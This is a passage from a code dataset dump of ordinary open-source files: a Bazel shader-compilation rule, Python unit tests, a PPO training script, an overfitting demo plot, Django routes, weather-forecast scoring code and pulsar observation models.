'/' + outdir + '/' + name + '.bin'\n\n varying_def = get_varying_def(f, varying_defs, root_varying_def)\n\n out = ctx.actions.declare_file(outpath)\n runtime_files.append(out)\n\n ctx.actions.run_shell(\n outputs=[out],\n inputs=depset([\n f,\n varying_def,\n bgfx_shader.files.to_list()[0],\n ] + common),\n tools=depset([\n ctx.attr.tooling.files.to_list()[0],\n ]),\n command=shaderc_path + ' '.join([\n ' -f',\n f.path,\n '-o',\n out.path,\n '--type',\n shader_type,\n '--platform',\n platform,\n '-p',\n render_type,\n '-i',\n bgfx_shader.files.to_list()[0].dirname,\n '-i',\n root_varying_def.dirname,\n '--varyingdef',\n varying_def.path,\n ]),\n progress_message='Compiling shader: ' + f.path,\n mnemonic = 'ShaderCompile'\n )\n\n frag_lines = []\n for program_name, outpath, outdir in frags:\n if outdir:\n frag_lines.append('namespace ' + outdir.replace('/', '::') + ' {')\n frag_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n frag_lines.append('}')\n else:\n frag_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n\n vert_lines = []\n for program_name, outpath, outdir in verts:\n if outdir:\n vert_lines.append('namespace ' + outdir.replace('/', '::') + ' {')\n vert_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n vert_lines.append('}')\n else:\n vert_lines.append('inline const char* const ' + program_name + ' = \"' + outpath + '\";')\n\n generated_lines = [\n 
'#pragma once',\n '#include ',\n '// -------- autogenerated ---------',\n 'namespace generated::shaders {',\n 'namespace frag {'\n ] + frag_lines + [\n '} // namespace frag',\n 'namespace vert {'\n ] + vert_lines + [\n '} // namespace vert',\n '} // namespace generated::shaders',\n ]\n\n ctx.actions.write(\n output = header_out,\n content = '\\n'.join(generated_lines),\n )\n\n compile_ctx = cc_common.create_compilation_context(\n headers=depset([header_out]),\n includes=depset([header_out.dirname])\n )\n\n cc_info = CcInfo(compilation_context=compile_ctx)\n\n return [\n DefaultInfo(files = depset([header_out]), runfiles = ctx.runfiles(files=runtime_files)),\n cc_info\n ]\n\n\nshader_sources = rule(\n implementation = _shaderc_impl,\n attrs = {\n 'common': attr.label_list(allow_files=['.sh']),\n 'shaders': attr.label_list(allow_files=['.sc']),\n 'tooling': attr.label(allow_single_file=True),\n 'bgfx_shader': attr.label(),\n },\n)\n","repo_name":"mosure/bgfx-bazel","sub_path":"tools/shaderc.bzl","file_name":"shaderc.bzl","file_ext":"bzl","file_size_in_byte":5094,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"20"} +{"seq_id":"35317029126","text":"from __future__ import annotations\n\nimport datetime\nimport json\nimport pathlib\nfrom copy import deepcopy\nfrom typing import TYPE_CHECKING, Any\n\nfrom hondana.chapter import Chapter\nfrom hondana.utils import RelationshipResolver, to_snake_case\n\nif TYPE_CHECKING:\n from hondana.http import HTTPClient\n from hondana.types_.chapter import GetSingleChapterResponse\n from hondana.types_.manga import MangaResponse\n from hondana.types_.scanlator_group import ScanlationGroupResponse\n from hondana.types_.user import UserResponse\n\n\nPATH: pathlib.Path = pathlib.Path(__file__).parent / \"payloads\" / \"chapter.json\"\n\nPAYLOAD: GetSingleChapterResponse = json.load(PATH.open())\nHTTP: HTTPClient = object() # type: ignore # this is just for test purposes.\n\n\ndef clone_chapter() -> Chapter:\n t = deepcopy(PAYLOAD)\n assert \"relationships\" in t[\"data\"]\n return Chapter(HTTP, t[\"data\"])\n\n\nclass TestChapter:\n def test_id(self) -> None:\n chapter = clone_chapter()\n assert chapter.id == PAYLOAD[\"data\"][\"id\"]\n\n def test_attributes(self) -> None:\n chapter = clone_chapter()\n for item in PAYLOAD[\"data\"][\"attributes\"]:\n if item == \"publishAt\":\n item = \"publishedAt\" # special cased because it's the only attribute that is future tense, i.e. 
created_at, updated_at vs publish_at.\n assert hasattr(chapter, to_snake_case(item))\n\n def test_relationship_length(self) -> None:\n chapter = clone_chapter()\n assert chapter.manga is not None\n assert chapter.scanlator_groups is not None\n assert chapter.uploader is not None\n obj_len = len(chapter.scanlator_groups) + 2 # scanlator and manga\n\n assert \"relationships\" in PAYLOAD[\"data\"]\n assert obj_len == len(PAYLOAD[\"data\"][\"relationships\"])\n\n def test_to_dict(self) -> None:\n chapter = clone_chapter()\n ret: dict[str, Any] = chapter.to_dict()\n\n assert bool(ret)\n\n def test_manga_property(self) -> None:\n chapter = clone_chapter()\n\n cloned = deepcopy(PAYLOAD)\n assert \"relationships\" in cloned[\"data\"]\n manga_rel = RelationshipResolver[\"MangaResponse\"](cloned[\"data\"][\"relationships\"], \"manga\").resolve()[0]\n\n assert chapter.manga is not None\n assert manga_rel is not None\n assert chapter.manga.id == manga_rel[\"id\"]\n\n def test_manga_id_property(self) -> None:\n chapter = clone_chapter()\n\n assert chapter.manga is not None\n assert chapter.manga_id == chapter.manga.id\n\n def test_scanlator_groups_property(self) -> None:\n chapter = clone_chapter()\n\n cloned = deepcopy(PAYLOAD)\n assert \"relationships\" in cloned[\"data\"]\n ret = RelationshipResolver[\"ScanlationGroupResponse\"](cloned[\"data\"][\"relationships\"], \"scanlation_group\").resolve()\n\n assert chapter.scanlator_groups is not None\n assert len(ret) == len(chapter.scanlator_groups)\n\n def test_uploader_property(self) -> None:\n chapter = clone_chapter()\n\n assert chapter.uploader is not None\n\n assert \"relationships\" in PAYLOAD[\"data\"]\n uploader_rel = RelationshipResolver[\"UserResponse\"](PAYLOAD[\"data\"][\"relationships\"], \"user\").resolve()[0]\n assert uploader_rel is not None\n\n assert chapter.uploader.id == uploader_rel[\"id\"]\n\n def test_datetime_props(self) -> None:\n chapter = clone_chapter()\n\n assert chapter.created_at == datetime.datetime.fromisoformat(PAYLOAD[\"data\"][\"attributes\"][\"createdAt\"])\n assert chapter.published_at == datetime.datetime.fromisoformat(PAYLOAD[\"data\"][\"attributes\"][\"publishAt\"])\n assert chapter.updated_at == datetime.datetime.fromisoformat(PAYLOAD[\"data\"][\"attributes\"][\"updatedAt\"])\n","repo_name":"AbstractUmbra/Hondana","sub_path":"tests/test_chapter.py","file_name":"test_chapter.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"20"} +{"seq_id":"23102387508","text":"\nfrom PPO import PPO\nfrom common.utils import agg_double_list\n\nimport sys\nimport gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nMAX_EPISODES = 5000\nEPISODES_BEFORE_TRAIN = 0\nEVAL_EPISODES = 10\nEVAL_INTERVAL = 100\n\n# roll out n steps\nROLL_OUT_N_STEPS = 10\n# only remember the latest ROLL_OUT_N_STEPS\nMEMORY_CAPACITY = ROLL_OUT_N_STEPS\n# only use the latest ROLL_OUT_N_STEPS for training PPO\nBATCH_SIZE = ROLL_OUT_N_STEPS\n\nTARGET_UPDATE_STEPS = 5\nTARGET_TAU = 1.0\n\nREWARD_DISCOUNTED_GAMMA = 0.99\nENTROPY_REG = 0.00\n#\nDONE_PENALTY = -10.\n\nCRITIC_LOSS = \"mse\"\nMAX_GRAD_NORM = None\n\nEPSILON_START = 0.99\nEPSILON_END = 0.05\nEPSILON_DECAY = 500\n\nRANDOM_SEED = 2017\n\n\ndef run(env_id=\"CartPole-v0\"):\n\n env = gym.make(env_id)\n env.seed(RANDOM_SEED)\n env_eval = gym.make(env_id)\n env_eval.seed(RANDOM_SEED)\n state_dim = env.observation_space.shape[0]\n if len(env.action_space.shape) > 1:\n action_dim = env.action_space.shape[0]\n 
else:\n action_dim = env.action_space.n\n\n ppo = PPO(env=env, memory_capacity=MEMORY_CAPACITY,\n state_dim=state_dim, action_dim=action_dim,\n batch_size=BATCH_SIZE, entropy_reg=ENTROPY_REG,\n done_penalty=DONE_PENALTY, roll_out_n_steps=ROLL_OUT_N_STEPS,\n target_update_steps=TARGET_UPDATE_STEPS, target_tau=TARGET_TAU,\n reward_gamma=REWARD_DISCOUNTED_GAMMA,\n epsilon_start=EPSILON_START, epsilon_end=EPSILON_END,\n epsilon_decay=EPSILON_DECAY, max_grad_norm=MAX_GRAD_NORM,\n episodes_before_train=EPISODES_BEFORE_TRAIN,\n critic_loss=CRITIC_LOSS)\n\n episodes =[]\n eval_rewards =[]\n while ppo.n_episodes < MAX_EPISODES:\n ppo.interact()\n if ppo.n_episodes >= EPISODES_BEFORE_TRAIN:\n ppo.train()\n if ppo.episode_done and ((ppo.n_episodes+1)%EVAL_INTERVAL == 0):\n rewards, _ = ppo.evaluation(env_eval, EVAL_EPISODES)\n rewards_mu, rewards_std = agg_double_list(rewards)\n print(\"Episode %d, Average Reward %.2f\" % (ppo.n_episodes+1, rewards_mu))\n episodes.append(ppo.n_episodes+1)\n eval_rewards.append(rewards_mu)\n\n episodes = np.array(episodes)\n eval_rewards = np.array(eval_rewards)\n np.savetxt(\"./output/%s_ppo_episodes.txt\"%env_id, episodes)\n np.savetxt(\"./output/%s_ppo_eval_rewards.txt\"%env_id, eval_rewards)\n\n plt.figure()\n plt.plot(episodes, eval_rewards)\n plt.title(\"%s\" % env_id)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Average Reward\")\n plt.legend([\"PPO\"])\n plt.savefig(\"./output/%s_ppo.png\"%env_id)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 2:\n run(sys.argv[1])\n else:\n run()\n","repo_name":"ChenglongChen/pytorch-DRL","sub_path":"run_ppo.py","file_name":"run_ppo.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":448,"dataset":"github-code","pt":"20"} +{"seq_id":"32976134724","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Linear regression illustration.\n\nAuthor: Leonard Seydoux\nEmail: leonard.seydoux@univ-grenoble-alpes.fr\nDate: Nov. 2019\n\"\"\"\n\nimport numpy as np\n\nfrom matplotlib import pyplot as plt\nfrom sklearn.neighbors import KNeighborsRegressor\n\n# Generate data\nn = 15\nnp.random.seed(1)\nx = np.random.randn(n)\na = .7\nb = -.5\nc = -1\nd = -.5\ny = a * x ** 3 + b * x ** 2 + c * x + d + 1. * np.random.randn(n)\n\n# Put into good shape\nx = x.reshape(-1, 1)\ny = y.reshape(-1, 1)\n\nmodel = KNeighborsRegressor(n_neighbors=1)\nmodel.fit(x, y)\n\n# Show data\nxt = np.linspace(-3, 3).reshape(-1, 1)\nyt = a * xt ** 3 + + b * xt ** 2 + c * xt + d\nfig, ax = plt.subplots(1, figsize=(4, 3))\nax.plot(x, y, '.', label='Data point', mec='k')\nax.plot(xt, yt, '--', label='Ground truth')\nax.plot(xt, model.predict(xt), '-', label='Overfitting model')\nax.set_xlim([-3, 3])\nax.set_ylim([-3, 3])\nax.set_xticks([])\nax.set_yticks([])\nax.set_xlabel(r'Input data ($x$)')\nax.set_ylabel(r'Label ($y$)')\nax.legend()\nfig.savefig('fig_7.png', transparent=True)\n","repo_name":"leonard-seydoux/frontiers_in_earth_sciences","sub_path":"linear_regression/overfitting.py","file_name":"overfitting.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"8558149216","text":"from django.urls import path,include, re_path\nfrom . 
import views\n\nurlpatterns = [\n\n # path('', views.DashboardView.as_view()),\n path('', views.get_board),\n\n ## Project List\n path('list', views.ProjectList.as_view(), name='project_list'),\n path('view/', views.ProjectDetail.as_view(), name='project_view'),\n path('edit/', views.ProjectUpdate.as_view(), name='project_edit'),\n path('delete/', views.ProjectDelete.as_view(), name='project_delete'),\n path('new-project', views.ProjectCreate.as_view(), name='project_new'),\n\n ## Category List\n path('list-categories', views.CategoryList.as_view(), name='category_list'),\n path('new-category', views.CategoryCreate.as_view(), name='category_new'),\n path('edit-category/', views.CategoryUpdate.as_view(), name='category_edit'),\n path('delete-category/', views.CategoryDelete.as_view(), name='category_delete'),\n\n ## Entries\n path('list-entries', views.EntryList.as_view(), name='entry_list'),\n path('new-entry', views.EntryCreate.as_view(), name='entry_new'),\n path('edit-entry/', views.EntryUpdate.as_view(), name='entry_edit'),\n path('delete-entry/', views.EntryDelete.as_view(), name='entry_delete'),\n]","repo_name":"my443/myboard","sub_path":"myboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"9702346098","text":"## import sys\n\n\nn = int(input())\nu = set()\nfor _ in range(n):\n u.add(int(input()))\n\na_b_sum = set()\nfor i in u:\n for j in u:\n a_b_sum.add(i+j)\nans = {}\nfor i in u:\n for j in u:\n if (i-j) in a_b_sum:\n ans[i] = (i,j,i-j)\nkeys = list(ans.keys())\nkeys.sort(reverse = True)\nprint(keys[0])\n","repo_name":"JaehwanO/Codingtest","sub_path":"search/10.17/#2295.py","file_name":"#2295.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"14248739394","text":"import argparse\nimport datetime\nimport logging\nimport os\nimport tempfile\nfrom typing import IO, List\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport xarray as xr\nfrom modulus.distributed.manager import DistributedManager\n\nimport earth2mip.forecast_metrics_io\nfrom earth2mip import _cli_utils, config, initial_conditions, time_loop\nfrom earth2mip.initial_conditions import hdf5\n\n__all__ = [\"score_deterministic\"]\n\n\nclass RMSE:\n output_names = [\"mse\"]\n\n def __init__(self, weight=None):\n self._xy = {}\n self.weight = weight\n\n def _mean(self, x):\n if self.weight is not None:\n x = self.weight * x\n denom = self.weight.mean(-1).mean(-1)\n else:\n denom = 1\n\n num = x.mean(0).mean(-1).mean(-1)\n return num / denom\n\n def call(self, truth, pred):\n xy = self._mean((truth - pred) ** 2)\n return (xy.cpu(),)\n\n def gather(self, seq):\n return torch.sqrt(sum(seq) / len(seq))\n\n\nclass ACC:\n output_names = [\"xx\", \"yy\", \"xy\"]\n\n def __init__(self, mean, weight=None):\n self.mean = mean\n self._xy = {}\n self._xx = {}\n self._yy = {}\n self.weight = weight\n\n def _mean(self, x):\n if self.weight is not None:\n x = self.weight * x\n denom = self.weight.mean(-1).mean(-1)\n else:\n denom = 1\n\n num = x.mean(0).mean(-1).mean(-1)\n return num / denom\n\n def call(self, truth, pred):\n xx = self._mean((truth - self.mean) ** 2).cpu()\n yy = self._mean((pred - self.mean) ** 2).cpu()\n xy = self._mean((pred - self.mean) * (truth - self.mean)).cpu()\n return xx, yy, xy\n\n def gather(self, seq):\n \"\"\"seq is an iterable of (xx, yy, xy) tuples\"\"\"\n # 
transpose seq\n xx, yy, xy = zip(*seq)\n\n xx = sum(xx)\n xy = sum(xy)\n yy = sum(yy)\n return xy / torch.sqrt(xx) / torch.sqrt(yy)\n\n\nlogging.basicConfig(level=logging.INFO)\n\nlogger = logging.getLogger(\"inference\")\n\n\ndef flat_map(func, seq, *args):\n for x in seq:\n yield from func(x, *args)\n\n\ndef run_forecast(\n model: time_loop.TimeLoop,\n n,\n initial_times,\n device,\n data_source: initial_conditions.base.DataSource,\n mean,\n f: IO[str],\n):\n mean = mean.squeeze()\n assert mean.ndim == 3 # noqa\n\n nlat = len(model.grid.lat)\n channels = [\n data_source.channel_names.index(name) for name in model.out_channel_names\n ]\n mean = mean[channels, :nlat]\n mean = torch.from_numpy(mean).to(device)\n\n lat = np.deg2rad(model.grid.lat)\n assert lat.ndim == 1 # noqa\n weight = np.cos(lat)[:, np.newaxis]\n weight_torch = torch.from_numpy(weight).to(device)\n\n acc = ACC(mean, weight=weight_torch)\n metrics = [acc, RMSE(weight=weight_torch)]\n\n def process(initial_time):\n logger.info(f\"Running {initial_time}\")\n x = initial_conditions.get_initial_condition_for_model(\n time_loop=model, data_source=data_source, time=initial_time\n )\n logger.debug(\"Initial Condition Loaded.\")\n i = -1\n for valid_time, data, _ in model(x=x, time=initial_time):\n assert data.shape[1] == len(model.out_channel_names) # noqa\n i += 1\n if i > n:\n break\n\n lead_time = valid_time - initial_time\n logger.debug(f\"{valid_time}\")\n # TODO make this more performant grabs all history steps unnecessarily\n verification_torch = initial_conditions.get_initial_condition_for_model(\n time_loop=model, data_source=data_source, time=valid_time\n )\n # select first history level\n verification_torch = verification_torch[:, -1]\n for metric in metrics:\n outputs = metric.call(verification_torch, data)\n for name, tensor in zip(metric.output_names, outputs):\n v = tensor.cpu().numpy()\n for c_idx in range(len(model.out_channel_names)):\n earth2mip.forecast_metrics_io.write_metric(\n f,\n initial_time,\n lead_time,\n model.out_channel_names[c_idx],\n name,\n value=v[c_idx],\n )\n\n for initial_time in initial_times:\n process(initial_time)\n\n\ndef score_deterministic(\n model: time_loop.TimeLoop, n: int, initial_times, data_source, time_mean\n) -> xr.Dataset:\n \"\"\"Compute deterministic accs and rmses\n\n Args:\n model: the inference class\n n: the number of lead times\n initial_times: the initial_times to compute over\n data_source: a mapping from time to dataset, used for the initial\n condition and the scoring\n time_mean: a (channel, lat, lon) numpy array containing the time_mean.\n Used for ACC.\n\n Returns:\n metrics: an xarray dataset wtih this structure::\n netcdf dlwp.baseline {\n dimensions:\n lead_time = 57 ;\n channel = 7 ;\n initial_time = 1 ;\n variables:\n int64 lead_time(lead_time) ;\n lead_time:units = \"hours\" ;\n string channel(channel) ;\n double acc(lead_time, channel) ;\n acc:_FillValue = NaN ;\n double rmse(lead_time, channel) ;\n rmse:_FillValue = NaN ;\n int64 initial_times(initial_time) ;\n initial_times:units = \"days since 2018-11-30 12:00:00\" ;\n initial_times:calendar = \"proleptic_gregorian\" ;\n }\n \"\"\"\n if torch.distributed.is_initialized():\n rank = torch.distributed.get_rank()\n world_size = torch.distributed.get_world_size()\n device = f\"cuda:{rank % world_size}\"\n else:\n rank = 0\n world_size = 1\n device = \"cuda:0\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n save_scores(\n model,\n n,\n initial_times,\n data_source,\n time_mean,\n 
output_directory=tmpdir,\n rank=rank,\n world_size=world_size,\n device=device,\n )\n series = earth2mip.forecast_metrics_io.read_metrics(tmpdir)\n return time_average_metrics(series)\n\n\ndef time_average_metrics(series: pd.Series) -> xr.Dataset:\n \"\"\"Average the metrics across initial time and compute ACC, RMSE\n\n Note, this contrasts from other uses of ACC like weather bench 2.0, since\n the ACC is only formed after the means are taken.\n \"\"\"\n data_array = series.to_xarray()\n dataset = data_array.to_dataset(dim=\"metric\")\n mean = dataset.mean(\"initial_time\")\n out = xr.Dataset()\n out[\"rmse\"] = np.sqrt(mean[\"mse\"])\n out[\"acc\"] = mean[\"xy\"] / np.sqrt(mean[\"xx\"] * mean[\"yy\"])\n out[\"initial_times\"] = dataset[\"initial_time\"]\n return out\n\n\ndef save_scores(\n model: time_loop.TimeLoop,\n n: int,\n initial_times: List[datetime.datetime],\n data_source: initial_conditions.base.DataSource,\n time_mean: np.ndarray,\n output_directory: str,\n rank: int = 0,\n world_size: int = 1,\n device: str = \"cuda\",\n) -> None:\n \"\"\"Compute deterministic skill scores, saving the results the a csv file\n\n Saves the sufficient statistics to compute ACC and RMSE to a csv file for\n each (lead_time, initial_time, channel) tuple.\n\n For ACC these are xx, xy, and yy. So ACC = E[xy] / sqrt(E[xx] * E[yy]).\n\n For RMSE this is MSE. So RMSE=sqrt(E[MSE]).\n\n E is an averaging operator.\n\n Args:\n model: the inference class\n n: the number of lead times\n initial_times: the initial_times to compute over\n data_source: a mapping from time to dataset, used for the initial\n condition and the scoring\n time_mean: a (channel, lat, lon) numpy array containing the time_mean.\n Used for ACC.\n\n Returns:\n metrics\n\n \"\"\"\n local_initial_times = initial_times[rank::world_size]\n os.makedirs(output_directory, exist_ok=True)\n csv_path = os.path.join(output_directory, f\"{rank}.csv\")\n with open(csv_path, \"a\") as f:\n run_forecast(\n model,\n n=n,\n device=device,\n initial_times=local_initial_times,\n data_source=data_source,\n mean=time_mean,\n f=f,\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n _cli_utils.add_model_args(parser, required=True)\n _cli_utils.TimeRange.add_args(parser.add_argument_group(\"Initial Time Selection\"))\n parser.add_argument(\"output\")\n parser.add_argument(\"-n\", type=int, default=4)\n parser.add_argument(\"--test\", action=\"store_true\")\n parser.add_argument(\n \"--shard\",\n type=int,\n default=0,\n help=\"shard index. Often set to SLURM_ARRAY_TASK_ID.\",\n )\n parser.add_argument(\n \"--n-shards\",\n type=int,\n default=1,\n help=\"number of shards. 
Often set to SLURM_ARRAY_TASK_COUNT.\",\n )\n # TODO refactor this to a shared place\n parser.add_argument(\n \"--data\", type=str, help=\"path to hdf5 root directory containing data.json\"\n )\n\n args = parser.parse_args()\n DistributedManager.initialize()\n dist = DistributedManager()\n initial_times = _cli_utils.TimeRange.from_args(args)\n\n if args.shard >= args.n_shards:\n raise ValueError(\"shard must be less than n-shards\")\n\n if args.test:\n initial_times = initial_times[-dist.world_size :]\n\n model = _cli_utils.model_from_args(args, dist.device)\n\n data_source = hdf5.DataSource.from_path(\n args.data or config.ERA5_HDF5_73, channel_names=model.in_channel_names\n )\n # time mean\n save_scores(\n model,\n n=args.n,\n initial_times=initial_times,\n data_source=data_source,\n time_mean=data_source.time_means,\n output_directory=args.output,\n rank=args.shard * args.n_shards + dist.rank,\n world_size=dist.world_size * args.n_shards,\n device=dist.device,\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NVIDIA/earth2mip","sub_path":"earth2mip/inference_medium_range.py","file_name":"inference_medium_range.py","file_ext":"py","file_size_in_byte":10319,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"20"} +{"seq_id":"74253487408","text":"import math\nimport pytz\nfrom datetime import datetime\nfrom dateutil import parser\nfrom django.db import models\nfrom dataportal.models import (\n Foldings,\n Observations,\n Filterbankings,\n Sessions,\n Processings,\n Pipelinefiles,\n)\nfrom django.db.models import JSONField, Q\nfrom statistics import mean\nfrom web_cache.plot_types import PLOT_NAMES\nfrom utils.constants import UserRole\n\nBAND_CHOICES = (\n (\"L-Band\", \"L-Band\"),\n (\"S-Band\", \"S-Band\"),\n (\"UHF\", \"UHF\"),\n (\"UNKNOWN\", \"Unknown\"),\n)\n\nBANDS = {\n \"UHF\": {\"centre_frequency\": 830.0, \"allowed_deviation\": 200.0},\n \"L-Band\": {\"centre_frequency\": 1284.0, \"allowed_deviation\": 200.0},\n \"S-Band\": {\"centre_frequency\": 2625.0, \"allowed_deviation\": 200.0},\n}\n\n\nclass BasePulsar(models.Model):\n \"\"\"\n Abstract class to store common methods and attributes that Searchmode and Foldings share.\n \"\"\"\n\n main_project = models.CharField(max_length=64)\n project = models.CharField(max_length=500)\n all_projects = models.CharField(max_length=500)\n band = models.CharField(choices=BAND_CHOICES, max_length=50)\n jname = models.CharField(max_length=64)\n latest_observation = models.DateTimeField()\n first_observation = models.DateTimeField()\n timespan = models.IntegerField()\n number_of_observations = models.IntegerField()\n beam = models.CharField(max_length=16)\n comment = models.TextField(null=True)\n\n class Meta:\n abstract = True\n unique_together = [[\"main_project\", \"jname\"]]\n ordering = [\"-latest_observation\"]\n\n @classmethod\n def get_query(cls, **kwargs):\n if \"band\" in kwargs:\n if kwargs[\"band\"] == \"All\":\n kwargs.pop(\"band\")\n else:\n kwargs[\"band__icontains\"] = kwargs.pop(\"band\")\n\n if \"project\" in kwargs:\n if kwargs[\"project\"] == \"All\":\n kwargs.pop(\"project\")\n else:\n kwargs[\"project__icontains\"] = kwargs.pop(\"project\")\n\n if \"main_project\" in kwargs and kwargs[\"main_project\"] == \"All\":\n kwargs.pop(\"main_project\")\n\n return cls.objects.filter(**kwargs)\n\n @classmethod\n def get_band(cls, frequency):\n \"\"\"\n Band is the string representation of the frequency used by astronomers.\n\n There are 3 bands that most frequencies should fit 
into.\n UHF: Ultra High Frequency / 50-cm band, in the range 300 MHZ to 1 GHZ\n L-band: 20-cm band, around Hydrogen transition line ~1.42 GHz\n S-band: 10-cm band, around 2.6 GHz\n \"\"\"\n\n return next(\n (\n band\n for band, frequencies in BANDS.items()\n if abs(float(frequency) - frequencies[\"centre_frequency\"]) < frequencies[\"allowed_deviation\"]\n ),\n \"UNKNOWN\",\n )\n\n @classmethod\n def get_by_session(cls, session):\n return cls.objects.filter(latest_observation__range=(session.start, session.end))\n\n @classmethod\n def most_common_project(cls, observations):\n project_counts = {}\n for observation in observations:\n # If you like it, then you should have put a key on it.\n project_short = observation.project.short\n if project_short in project_counts:\n # I'm a survivor, I'm not a quitter, I'm gonna increment until I'm a winner.\n project_counts[project_short] += 1\n else:\n project_counts[project_short] = 1\n\n # To the left, to the left\n # Find the key with the highest count, to the left\n return max(project_counts, key=project_counts.get)\n\n\nclass SearchmodePulsar(BasePulsar):\n @classmethod\n def update_or_create(cls, target):\n raw_observations = Observations.objects.filter(target=target)\n\n filterbankings = Filterbankings.objects.filter(processing__observation__in=raw_observations).order_by(\n \"-processing__observation__utc_start\"\n )\n\n observation_ids = [f.processing.observation.id for f in filterbankings]\n target_observations = raw_observations.filter(id__in=observation_ids)\n\n latest_observation = target_observations.order_by(\"-utc_start\").first().utc_start\n first_observation = target_observations.order_by(\"-utc_start\").last().utc_start\n timespan = (latest_observation - first_observation).days + 1\n number_of_observations = target_observations.count()\n\n all_projects = \", \".join({observation.project.short for observation in target_observations})\n\n most_common_project = cls.most_common_project(target_observations)\n\n try:\n main_project = latest_observation.project.program.name\n except AttributeError:\n main_project = \"meertime\"\n\n return SearchmodePulsar.objects.update_or_create(\n main_project=main_project,\n jname=target.name,\n defaults={\n \"all_projects\": all_projects,\n \"project\": most_common_project,\n \"latest_observation\": latest_observation,\n \"first_observation\": first_observation,\n \"timespan\": timespan,\n \"number_of_observations\": number_of_observations,\n },\n )\n\n\nclass FoldPulsar(BasePulsar):\n total_integration_hours = models.DecimalField(max_digits=12, decimal_places=1)\n last_sn_raw = models.DecimalField(max_digits=12, decimal_places=1)\n highest_sn_raw = models.DecimalField(max_digits=12, decimal_places=1)\n lowest_sn_raw = models.DecimalField(max_digits=12, decimal_places=1)\n avg_sn_pipe = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n max_sn_pipe = models.DecimalField(max_digits=12, decimal_places=1, null=True)\n last_integration_minutes = models.FloatField(null=True)\n\n @property\n def session(self):\n return Sessions.get_session(self.latest_observation)\n\n @classmethod\n def update_or_create(cls, pulsar, program_name):\n \"\"\"\n Processes data from multiple tables into a single source that can be consumed directly\n by the web application through graphql.\n\n Parameters:\n pulsar: A pulsar model instance.\n program_name: String that represents the program name used for filtering foldings.\n \"\"\"\n\n # Get various related model objects required using the saved folding instance as 
a base.\n foldings = Foldings.objects.select_related(\"folding_ephemeris\", \"processing\",).filter(\n folding_ephemeris__pulsar=pulsar,\n processing__observation__project__program__name=program_name,\n )\n\n if not foldings:\n return\n\n folding_observations = [folding.processing.observation for folding in foldings]\n latest_folding_observation = foldings.order_by(\"-processing__observation__utc_start\").first()\n\n results = latest_folding_observation.processing.results\n\n # Process data\n latest_observation = (\n foldings.order_by(\"-processing__observation__utc_start\").first().processing.observation.utc_start\n )\n\n first_observation = (\n foldings.order_by(\"-processing__observation__utc_start\").last().processing.observation.utc_start\n )\n\n timespan = (latest_observation - first_observation).days + 1\n number_of_observations = foldings.count()\n total_integration_hours = (\n sum(\n folding.processing.observation.duration\n for folding in foldings\n if folding.processing.observation.duration\n )\n / 60\n / 60\n )\n\n last_sn_raw = results.get(\"snr\", 0)\n last_integration_minutes = latest_folding_observation.processing.observation.duration / 60\n\n all_projects = \", \".join({observation.project.short for observation in folding_observations})\n\n most_common_project = cls.most_common_project(folding_observations)\n\n highest_sn_raw = max(folding.processing.results.get(\"snr\", 1) for folding in foldings)\n lowest_sn_raw = min(folding.processing.results.get(\"snr\", 0) for folding in foldings)\n\n bands = \", \".join(\n {cls.get_band(observation.instrument_config.frequency) for observation in folding_observations}\n )\n\n new_fold_pulsar, created = FoldPulsar.objects.update_or_create(\n main_project=program_name,\n jname=pulsar.jname,\n defaults={\n \"all_projects\": all_projects,\n \"project\": most_common_project,\n \"band\": bands,\n \"latest_observation\": latest_observation,\n \"first_observation\": first_observation,\n \"timespan\": timespan,\n \"number_of_observations\": number_of_observations,\n \"total_integration_hours\": total_integration_hours,\n \"last_sn_raw\": last_sn_raw,\n \"highest_sn_raw\": highest_sn_raw or 0,\n \"lowest_sn_raw\": lowest_sn_raw or 0,\n \"last_integration_minutes\": last_integration_minutes or 0,\n \"avg_sn_pipe\": cls.get_average_snr_over_5min(folding_observations),\n \"max_sn_pipe\": cls.get_max_snr_over_5min(folding_observations),\n \"beam\": latest_folding_observation.processing.observation.instrument_config.beam,\n \"comment\": pulsar.comment,\n },\n )\n\n # Add scrunched data file per project.\n scrunch_files = Pipelinefiles.objects.filter(file__contains=pulsar.jname, file_type__contains=\"FTS\")\n\n for file in scrunch_files:\n FoldPulsarFile.objects.update_or_create(\n fold_pulsar=new_fold_pulsar,\n file_meta=file.file_type,\n file=file.file,\n )\n\n return new_fold_pulsar, created\n\n @classmethod\n def get_snr_results(cls, pulsar_observations):\n observation_results = []\n for observation in pulsar_observations:\n observation_results.extend(\n {\"snr\": process.results[\"snr\"], \"length\": observation.duration}\n for process in observation.processings_set.all()\n if \"snr\" in process.results and \"length\" in process.results\n )\n return observation_results\n\n @classmethod\n def get_average_snr_over_5min(cls, pulsar_observations):\n # SNR is proportional to the sqrt of the observation length.\n # To get the average SNR from a 5 minute block of observations we calculate the observation snr / sqrt And\n observation_results = 
